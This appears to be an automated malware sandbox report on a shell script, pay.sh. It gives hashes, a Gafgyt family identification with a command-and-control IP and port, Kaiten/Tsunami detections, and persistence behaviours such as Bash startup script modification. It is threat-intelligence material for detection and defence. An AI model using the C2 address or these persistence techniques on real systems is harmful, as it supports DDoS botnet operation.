General

  • Target

    pay.sh

  • Size

    3KB

  • Sample

    241022-tnksqatdje

  • MD5

    cf70ee36f1e9247f2146e4981924d4f4

  • SHA1

    7eabae4200118c4e89979658db6e4d905fe3dae9

  • SHA256

    0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c

  • SHA512

    60f6bdf8813ee328f747b722e8d8abb8ecd91836a96de7e877217c6794d4dcef56130f3f833f748637b0a7b81bac94ea7e3d9cb3dfff0a2060eab34c20070bd0

Malware Config

Extracted

Family

gafgyt

C2

104.234.24.138:1990

Targets

    • Target

      pay.sh

    • Size

      3KB

    • MD5

      cf70ee36f1e9247f2146e4981924d4f4

    • SHA1

      7eabae4200118c4e89979658db6e4d905fe3dae9

    • SHA256

      0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c

    • SHA512

      60f6bdf8813ee328f747b722e8d8abb8ecd91836a96de7e877217c6794d4dcef56130f3f833f748637b0a7b81bac94ea7e3d9cb3dfff0a2060eab34c20070bd0

    • Detected Gafgyt variant

    • Detects Kaiten/Tsunami Payload

    • Detects Kaiten/Tsunami payload

    • Gafgyt/Bashlite

      IoT botnet with numerous variants first seen in 2014.

    • Kaiten/Tsunami

      Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.

    • File and Directory Permissions Modification

      Adversaries may modify file or directory permissions to evade defenses.

    • Executes dropped EXE

    • Creates/modifies environment variables

      Creating/modifying environment variables is a common persistence mechanism.

    • Modifies Bash startup script

MITRE ATT&CK Enterprise v15

Tasks